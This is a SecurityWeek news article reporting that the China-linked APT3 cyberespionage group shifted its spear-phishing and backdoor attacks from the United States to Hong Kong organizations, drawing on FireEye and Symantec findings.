Security Experts:

Connect with us

Hi, what are you looking for?


Malware & Threats

China-Linked APT3 Group Focuses Attacks on Hong Kong

A China-linked cyberespionage group has shifted its attention from the United States to Hong Kong, where it has targeted more than a dozen organizations over the past year.

A China-linked cyberespionage group has shifted its attention from the United States to Hong Kong, where it has targeted more than a dozen organizations over the past year.

FireEye reported last week that APT3, a threat actor believed to be sponsored by China, had targeted two Hong Kong government agencies in early August. The attackers had used spear-phishing emails to trick recipients into installing what the security firm said was a previously unseen piece of malware.

APT3, also known as UPS Team, Gothic Panda, Buckeye and TG-0110, has been active since at least 2009. The group’s attacks often involved zero-day vulnerabilities and flaws that had just been patched.

Many of the group’s earlier attacks focused on the United States, including government organizations. However, Symantec, which tracks the threat actor as Buckeye, noticed last year that the hackers had become increasingly interested in Hong Kong.

Symantec observed roughly 82 APT3 victims since the beginning of 2015, but experts pointed out that the group had cast a wide net and only 17 of these organizations were persistently targeted. The list of victims included 13 organizations in Hong Kong, three in the U.S. and one in the U.K.

While there were some periods last year when all three countries had been targeted, researchers noticed that the U.K. and the U.S. were no longer attacked starting with March 2016.

In the recent attacks observed by Symantec, mostly aimed at political entities in Hong Kong, APT3 used ZIP archives and Windows shortcut (.lnk) files to deliver a backdoor dubbed by the security firm Pirpi.

The infection method appears to be the same in the attacks observed by FireEye – a ZIP archive contains a shortcut file that downloads malware. However, the early August attacks spotted by FireEye did not leverage Pirpi, which has been around since 2010 and which the company tracks as Backdoor.APT.CookieCutter. Instead, the security firm said they involved a new malware tool.

This suggests that China may have stepped up its attacks just before the Hong Kong legislative elections that took place on September 4. The Chinese government has been increasingly concerned about Hong Kong’s push for more political independence.

In addition to Pirpi, Symantec observed APT3 using various other tools, including keyloggers, remote command execution tools, system information harvesting tools, and browser password stealers. Researchers said the group appears to be focusing on file and print servers, which suggests they are mainly interested in stealing documents.

Written By

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Expert Insights

Related Content

Malware & Threats

Microsoft plans to improve the protection of Office users by blocking XLL add-ins from the internet.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...


CISA, NSA, and MS-ISAC issued an alert on the malicious use of RMM software to steal money from bank accounts.


Russia-linked cyberespionage group APT29 has been observed using embassy-themed lures and the GraphicalNeutrino malware in recent attacks.


No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.


Chinese threat actor DragonSpark has been using the SparkRAT open source backdoor in attacks targeting East Asian organizations.

Malware & Threats

Security researchers are warning of a new wave of malicious NPM and PyPI packages designed to steal user information and download additional payloads.


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.